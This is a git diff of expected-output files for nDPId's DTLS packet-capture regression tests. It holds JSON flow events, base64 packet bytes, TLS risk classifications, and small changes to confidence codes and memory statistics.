+01044{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dtls2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1507911659748,"flow_last_seen":1507911659748,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":1507911659748,"l3_proto":"ip4","src_ip":"61.68.110.153","dst_ip":"212.32.214.39","src_port":53045,"dst_port":61457,"l4_proto":"udp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"},"tls": 
{"version":"DTLSv1.0","client_requested_server_name":"","ja3":"1b45c913a0c0fde5f263502e65999485","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dtls2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1507911659964,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1507911659964,"pkt":"AAAAjZtQSEb7zh73CABFAABYGTZAAHIRmTnUINYnPURumfARzzUARCmdFv7\/AAAAAAAAAAAALwMAACMAAAAAAAAAI\/7\/IGQQTc4aUtGjb8ohVEQdgum4T0i11AHiQi9xw2nai\/UG"} 00588{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dtls2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1507911659975,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":155,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":155,"pkt_l4_len":121,"thread_ts_msec":1507911659975,"pkt":"AAAAjZtQSEb7zh73CABFAACN5wIAAD8RPjg9RG6Z1CDWJ8818BEAeRSaFv7\/AAAAAAAAAAEAZAEAAFgAAQAAAAAAWP7\/xZOd2weR7n4d5xLXjiJT803Vm2GyIJyqcktro0p9KtUAIGQQTc4aUtGjb8ohVEQdgum4T0i11AHiQi9xw2nai\/UGABAANQAvAAUABAAKAPsA\/AD9AQA="} -01343{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"dtls2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1507911659748,"flow_last_seen":1507911660332,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":825,"flow_tot_l4_payload_len":1079,"flow_avg_l4_payload_len":269,"midstream":0,"thread_ts_msec":1507911660332,"l3_proto":"ip4","src_ip":"61.68.110.153","dst_ip":"212.32.214.39","src_port":53045,"dst_port":61457,"l4_proto":"udp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not 
Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"},"tls": {"version":"DTLSv1.0","client_requested_server_name":"","ja3":"1b45c913a0c0fde5f263502e65999485","ja3s":"749bd1edea60396ffaa65213b7971718","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US","subjectDN":"C=US, CN=*.relay.ros.rockstargames.com","fingerprint":"AB:59:0E:11:EC:94:4D:D5:D3:40:7E:6E:3B:8B:6A:19:CA:B7:85:2C"}} -01026{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":25,"source":"dtls2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1507911659748,"flow_last_seen":1507911868551,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":825,"flow_tot_l4_payload_len":3173,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1507911868551,"l3_proto":"ip4","src_ip":"61.68.110.153","dst_ip":"212.32.214.39","src_port":53045,"dst_port":61457,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"}} 
-01024{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"dtls2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1507911659748,"flow_last_seen":1507912041896,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":825,"flow_tot_l4_payload_len":3731,"flow_avg_l4_payload_len":124,"midstream":0,"thread_ts_msec":1507912041896,"l3_proto":"ip4","src_ip":"61.68.110.153","dst_ip":"212.32.214.39","src_port":53045,"dst_port":61457,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"}} +01343{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"dtls2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1507911659748,"flow_last_seen":1507911660332,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":825,"flow_tot_l4_payload_len":1079,"flow_avg_l4_payload_len":269,"midstream":0,"thread_ts_msec":1507911660332,"l3_proto":"ip4","src_ip":"61.68.110.153","dst_ip":"212.32.214.39","src_port":53045,"dst_port":61457,"l4_proto":"udp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": 
{"6":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"},"tls": {"version":"DTLSv1.0","client_requested_server_name":"","ja3":"1b45c913a0c0fde5f263502e65999485","ja3s":"749bd1edea60396ffaa65213b7971718","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US","subjectDN":"C=US, CN=*.relay.ros.rockstargames.com","fingerprint":"AB:59:0E:11:EC:94:4D:D5:D3:40:7E:6E:3B:8B:6A:19:CA:B7:85:2C"}} +01026{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":25,"source":"dtls2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1507911659748,"flow_last_seen":1507911868551,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":825,"flow_tot_l4_payload_len":3173,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1507911868551,"l3_proto":"ip4","src_ip":"61.68.110.153","dst_ip":"212.32.214.39","src_port":53045,"dst_port":61457,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"}} 
+01024{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"dtls2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1507911659748,"flow_last_seen":1507912041896,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":825,"flow_tot_l4_payload_len":3731,"flow_avg_l4_payload_len":124,"midstream":0,"thread_ts_msec":1507912041896,"l3_proto":"ip4","src_ip":"61.68.110.153","dst_ip":"212.32.214.39","src_port":53045,"dst_port":61457,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"}} 00554{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":30,"source":"dtls2.pcap","alias":"nDPId-test","packets-captured":30,"packets-processed":30,"total-skipped-flows":0,"total-l4-payload-len":3731,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":1,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1507912041896} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 30/30 
@@ -17,9 +17,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5870401 bytes -~~ total memory freed........: 5870401 bytes -~~ total allocations/frees...: 118148/118148 +~~ total memory allocated....: 6004035 bytes +~~ total memory freed........: 6004035 bytes +~~ total allocations/frees...: 120910/120910 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 1348 chars diff --git a/test/results/dtls_certificate.pcapng.out b/test/results/dtls_certificate.pcapng.out index ed5b3f64d..1e5e03a7d 100644 --- a/test/results/dtls_certificate.pcapng.out +++ b/test/results/dtls_certificate.pcapng.out 
@@ -2,8 +2,8 @@ 00558{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"dtls_certificate.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1645461580895} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dtls_certificate.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1645461580895,"flow_last_seen":1645461580895,"flow_idle_time":200000,"flow_min_l4_payload_len":1444,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":1444,"flow_avg_l4_payload_len":1444,"midstream":0,"thread_ts_msec":1645461580895,"l3_proto":"ip4","src_ip":"191.62.60.190","dst_ip":"163.205.15.180","src_port":443,"dst_port":38876,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02400{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dtls_certificate.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1645461580895,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1486,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1486,"pkt_l4_len":1452,"thread_ts_msec":1645461580895,"pkt":"AAEC3cZZAAAAw9EGCABFAAXASWxAADQRSEO\/Pjy+o80PtAG7l9wFrJO8Fv79AAAAAAAAAAIARQIAADkAAQAAAAAAOf79\/Kc4HE2ihqeGXU8HJgbvv17oNih5trwpTgkv9KYfrYAAwDAAABH\/AQABAAALAAQDAAECACMAABb+\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\/ZkyEWQKrdPC7T\/I\/VBlNaCjkhqqLjeWcxNjAXFgHV0DQS4Ohn1NUJhGwRm+C9xnh7uNg5h\/HW\/hZG6rQQT\/YIEe4RMEDoHNucdV0ldNkVXCWmH7VdyXRHfM9s1z8dmKF9BhxFUrUndT8KN51NorrFfTkRDxgaXL\/XiTXb5jjFdTMNDoWEcfCSn+mv6sdX3THlAvFHxknV8wAjqvNtxIjUk2YFzbeaTG2Q+ckuiam9dVPaH56OySqB0JYTcsJNz1EFEanNbn3YoH9U68KtmWqXQruXynN3poT1rVwEUFs6k6P4rp9p9jisxqFTQIDAQABo4IBUTCCAU0wDgYDVR0PAQH\/BAQDAgTwMBMGA1UdJQQMMAoGCCsGAQUFBwMBMB0GA1UdDgQWBBSLiU8Spy0D\/BrMqi4FzdoDPizAuzAfBgNVHSMEGDAWgBQTA4kJqE\/7jzADbipdbCNlgXR+uzBmBgNVHR8EXzBdMFugWaBXhlVodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NybC9NaWNyb3NvZnQlMjBVcGRhdGUlMjBTZWN1cmUlMjBTZXJ2ZXIlMjBDQSUyMDEuY3JsMHMGCCsGAQUFBwEBBGcwZTBjBggrBgEFBQcwAoZXaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBVcGRhdGUlMjBTZWN1cmUlMjBTZXJ2ZXIlMjBDQSUyMDEuY3J0MAkGA1UdEwQCMAAwDQYJKoZIhvcNAQEFBQADggEBAD\/XXW3cyN\/n\/BsXYc461vEQJ\/MooDP0uWOe5wtrpd3XUOKUuYcOvN70FidsM66xtY3sgdh6LUV7Vd3UbwrHsVXRThb+W0JmRxLpORJHovyCUjHJdgWcwAmAecZJ4QHbPt4JGKIezh1zC7zvwpMBEph7\/DE2rRq+Bk7Vj\/NpG5hi7ChZs0a\/4ZlQ63BMdels0iVL7Gl8j2rZV6AKE6rNjGoosoCEoztRWeQE8+sRCm+Ke3bWDxj6rORsUQGgzGimwUgWsdfd3Nhsgd7TmdyKcuJKVjK3IJvBgJOkTc6Wtb9I6keqOhJz+tW6pXPpKnm\/uuS9speSYMehXhdxy6auf74W\/v0AAAAAAAAABABGDAABSQADAAAAAAA6AwAXQQTUxAnF4aD29iFX08UpvzSYHoOfJnjbLUY7FaBYVdRtgMBGO\/4Mp6YBV28sDk7JZ2MLOl9WIA=="} 
-00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dtls_certificate.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1645461580895,"flow_last_seen":1645461580895,"flow_idle_time":200000,"flow_min_l4_payload_len":1444,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":1444,"flow_avg_l4_payload_len":1444,"midstream":0,"thread_ts_msec":1645461580895,"l3_proto":"ip4","src_ip":"191.62.60.190","dst_ip":"163.205.15.180","src_port":443,"dst_port":38876,"l4_proto":"udp","ndpi": {"flow_risk": {"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.WindowsUpdate","breed":"Safe","category":"SoftwareUpdate"}} -00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"dtls_certificate.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1645461580895,"flow_last_seen":1645461580895,"flow_idle_time":200000,"flow_min_l4_payload_len":1444,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":1444,"flow_avg_l4_payload_len":1444,"midstream":0,"thread_ts_msec":1645461580895,"l3_proto":"ip4","src_ip":"191.62.60.190","dst_ip":"163.205.15.180","src_port":443,"dst_port":38876,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.WindowsUpdate","breed":"Safe","category":"SoftwareUpdate"}} 
+00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dtls_certificate.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1645461580895,"flow_last_seen":1645461580895,"flow_idle_time":200000,"flow_min_l4_payload_len":1444,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":1444,"flow_avg_l4_payload_len":1444,"midstream":0,"thread_ts_msec":1645461580895,"l3_proto":"ip4","src_ip":"191.62.60.190","dst_ip":"163.205.15.180","src_port":443,"dst_port":38876,"l4_proto":"udp","ndpi": {"flow_risk": {"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.WindowsUpdate","breed":"Safe","category":"SoftwareUpdate"}} +00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"dtls_certificate.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1645461580895,"flow_last_seen":1645461580895,"flow_idle_time":200000,"flow_min_l4_payload_len":1444,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":1444,"flow_avg_l4_payload_len":1444,"midstream":0,"thread_ts_msec":1645461580895,"l3_proto":"ip4","src_ip":"191.62.60.190","dst_ip":"163.205.15.180","src_port":443,"dst_port":38876,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.WindowsUpdate","breed":"Safe","category":"SoftwareUpdate"}} 
00563{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"dtls_certificate.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":1,"total-skipped-flows":0,"total-l4-payload-len":1444,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":7,"global_ts_msec":1645461580895} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1/1 @@ -13,9 +13,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5877901 bytes -~~ total memory freed........: 5877901 bytes -~~ total allocations/frees...: 118120/118120 +~~ total memory allocated....: 6011535 bytes +~~ total memory freed........: 6011535 bytes +~~ total allocations/frees...: 120882/120882 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 474 chars ~~ json string max len.......: 2405 chars diff --git a/test/results/dtls_certificate_fragments.pcap.out b/test/results/dtls_certificate_fragments.pcap.out index 36d64808e..bbdea1b64 100644 --- a/test/results/dtls_certificate_fragments.pcap.out +++ b/test/results/dtls_certificate_fragments.pcap.out 
@@ -2,11 +2,11 @@ 00566{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"dtls_certificate_fragments.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1556606275726} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dtls_certificate_fragments.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1556606275726,"flow_last_seen":1556606275726,"flow_idle_time":200000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":0,"thread_ts_msec":1556606275726,"l3_proto":"ip4","src_ip":"10.186.198.149","dst_ip":"35.210.59.134","src_port":39347,"dst_port":44443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00873{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dtls_certificate_fragments.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1556606275726,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":354,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":354,"pkt_l4_len":320,"thread_ts_msec":1556606275726,"pkt":"AAAAp2BiAAAAtzPNCABFAAFUW5tAAD4Rr1YKusaVI9I7hpmzrZsBQKk0Fv7\/AAAAAAAAAAABKwEAAR8AAAAAAAABH\/79XLdFN6Sz4OQy2sCEjyxqziIlNS85zlQeFiYi19pl1vEAAACgwDDALMAowCTAFMAKAKUAowChAJ8AawBqAGkAaAA5ADgANwA2AIgAhwCGAIXAMsAuwCrAJsAPwAUAnQA9ADUAhMAvwCvAJ8AjwBPACQCkAKIAoACeAGcAQAA\/AD4AMwAyADEAMACaAJkAmACXAEUARABDAELAMcAtwCnAJcAOwAQAnAA8AC8AlgBBAAfAEsAIABYAEwAQAA3ADcADAAoA\/wEAAFUACwAEAwABAgAKABwAGgAXABkAHAAbABgAGgAWAA4ADQALAAwACQAKACMAAAANACAAHgYBBgIGAwUBBQIFAwQBBAIEAwMBAwIDAwIBAgICAwAPAAEB"} -01090{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dtls_certificate_fragments.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1556606275726,"flow_last_seen":1556606275726,"flow_idle_time":200000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":0,"thread_ts_msec":1556606275726,"l3_proto":"ip4","src_ip":"10.186.198.149","dst_ip":"35.210.59.134","src_port":39347,"dst_port":44443,"l4_proto":"udp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"DTLS.GoogleCloud","breed":"Acceptable","category":"Cloud"},"tls": {"version":"DTLSv1.2","client_requested_server_name":"","ja3":"3c3d129780d0066cd8936a6291a8d44f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01090{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dtls_certificate_fragments.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1556606275726,"flow_last_seen":1556606275726,"flow_idle_time":200000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":0,"thread_ts_msec":1556606275726,"l3_proto":"ip4","src_ip":"10.186.198.149","dst_ip":"35.210.59.134","src_port":39347,"dst_port":44443,"l4_proto":"udp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"DTLS.GoogleCloud","breed":"Acceptable","category":"Cloud"},"tls": {"version":"DTLSv1.2","client_requested_server_name":"","ja3":"3c3d129780d0066cd8936a6291a8d44f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dtls_certificate_fragments.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1556606275848,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1556606275848,"pkt":"AAAAp2BiAAAAtzPNCABFIABM4VFAAD4RKogj0juGCrrGla2bmbMAOPKRFv7\/AAAAAAAAAAAAIwMAABcAAAAAAAAAF\/7\/FGas+MFHIUbk58MIduuc4UCKEPlD"} 
00902{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dtls_certificate_fragments.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1556606275913,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":374,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":374,"pkt_l4_len":340,"thread_ts_msec":1556606275913,"pkt":"AAAAp2BiAAAAtzPNCABFAAFoW6pAAD4RrzMKusaVI9I7hpmzrZsBVHbeFv7\/AAAAAAAAAAEBPwEAATMAAQAAAAABM\/79XLdFN6Sz4OQy2sCEjyxqziIlNS85zlQeFiYi19pl1vEAFGas+MFHIUbk58MIduuc4UCKEPlDAKDAMMAswCjAJMAUwAoApQCjAKEAnwBrAGoAaQBoADkAOAA3ADYAiACHAIYAhcAywC7AKsAmwA\/ABQCdAD0ANQCEwC\/AK8AnwCPAE8AJAKQAogCgAJ4AZwBAAD8APgAzADIAMQAwAJoAmQCYAJcARQBEAEMAQsAxwC3AKcAlwA7ABACcADwALwCWAEEAB8ASwAgAFgATABAADcANwAMACgD\/AQAAVQALAAQDAAECAAoAHAAaABcAGQAcABsAGAAaABYADgANAAsADAAJAAoAIwAAAA0AIAAeBgEGAgYDBQEFAgUDBAEEAgQDAwEDAgMDAgECAgIDAA8AAQE="} -01239{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"dtls_certificate_fragments.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1556606275726,"flow_last_seen":1556606276035,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":1412,"flow_tot_l4_payload_len":2104,"flow_avg_l4_payload_len":526,"midstream":0,"thread_ts_msec":1556606276035,"l3_proto":"ip4","src_ip":"10.186.198.149","dst_ip":"35.210.59.134","src_port":39347,"dst_port":44443,"l4_proto":"udp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"DTLS.GoogleCloud","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"DTLSv1.2","client_requested_server_name":"","ja3":"3c3d129780d0066cd8936a6291a8d44f","ja3s":"d45798bc098cd930de7eb2f5f866e994","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA"}} -01067{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dtls_certificate_fragments.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1556606275726,"flow_last_seen":1556606278645,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":1412,"flow_tot_l4_payload_len":5138,"flow_avg_l4_payload_len":256,"midstream":0,"thread_ts_msec":1556606278645,"l3_proto":"ip4","src_ip":"10.186.198.149","dst_ip":"35.210.59.134","src_port":39347,"dst_port":44443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"DTLS.GoogleCloud","breed":"Acceptable","category":"Cloud"}} 